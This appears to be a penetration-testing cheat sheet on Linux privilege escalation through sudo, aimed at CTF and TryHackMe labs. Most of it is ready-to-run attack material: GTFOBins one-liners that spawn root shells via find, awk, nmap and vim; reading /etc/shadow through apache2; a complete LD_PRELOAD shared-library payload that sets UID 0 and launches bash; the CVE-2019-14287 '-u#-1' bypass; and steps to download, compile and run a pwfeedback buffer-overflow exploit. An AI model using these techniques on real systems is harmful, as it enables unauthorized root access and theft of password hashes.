Sudo

sudo -l

Enumeration

Always check sudo -l at the beginning of the privilege escalation phase.

The command sudo allows the current user to execute certain commands as other users. To view a list of such commands:

sudo -l

In the trivial case, the current user can execute any command as any user:

sudo -l

In this case we can spawn a root shell directly:

/bin/bash -p

Method 1: GTFOBins

For a privesc cheatsheet, check out GTFOBins:

GTFOBins

GTFOBins

Examples

If find is in sudo -l:

sudo find /bin -name nano -exec /bin/sh \;

If awk is in sudo -l:

sudo awk 'BEGIN {system("/bin/sh")}'

If nmap is in sudo -l:

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

If vim is in sudo -l:

sudo vim -c ':!/bin/sh'

Method 2: Intended Functionality

apache2

If apache2 is in sudo -l, then we can read the root password hash from /etc/shadow by triggering an error:

sudo apache2 -f /etc/shadow

wget

A wget privesc example:

Welcome to VetSec

wget privesc

Method 3: LD_PRELOAD

LD_PRELOAD is an environment variable that lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so.

If sudo -l finds LD_PRELOAD as well as some sudo command, for example, /usr/sbin/apache2:

env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2

then we can utilize this "feature" for privilege escalation. Store the following C program in /tmp:

x.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
	unsetenv("LD_PRELOAD"); // Unset env LD_PRELOAD
	setgid(0); // Set GID to root
	setuid(0); // Set UID to root
	system("/bin/bash"); // Execute /bin/bash
}

Compile it:

gcc -fPIC -shared -o x.so x.c -nostartfiles

Trigger it with any sudo command (this command can be anything, here apache2 is just an example):

sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2

Then we will get a root shell.

Method 4: Attacking Sudo Itself

CVE-2019-14287

sudo 1.8.27 - Security BypassExploit Database

sudo 1.8.27 - Security Bypass

If sudo -l shows we can execute /bin/bash as any user other than root:

(ALL, !root) /bin/bash

Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.

That means we can get a root shell using the following payload:

sudo -u#-1 /bin/bash

Test this CVE in TryHackMe:

TryHackMe | Sudo Security BypassTryHackMe

Sudo Security Bypass - TryHackMe

CVE-2019-18634

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC)Exploit Database

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow

In /etc/sudoers, there is an option named pwfeedback, which is turned off by default. If it is turned on, Linux will give you "feedback" when you type password by showing a asterisk for each character you type.

In Sudo 1.8.25p, this pwfeedback option leads to buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:

wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c

Compile it:

gcc -o exploit exploit.c

Give permission and run it:

chmod +x exploit ; ./exploit

Test this CVE in TryHackMe:

TryHackMe | Sudo Buffer OverflowTryHackMe

Sudo Buffer Overflow - TryHackMe

Challenge: TryHackMe - Simple CTF

TryHackMe - Simple CTF (Easy)ctfwriteup.com

TryHackMe - Simple CTF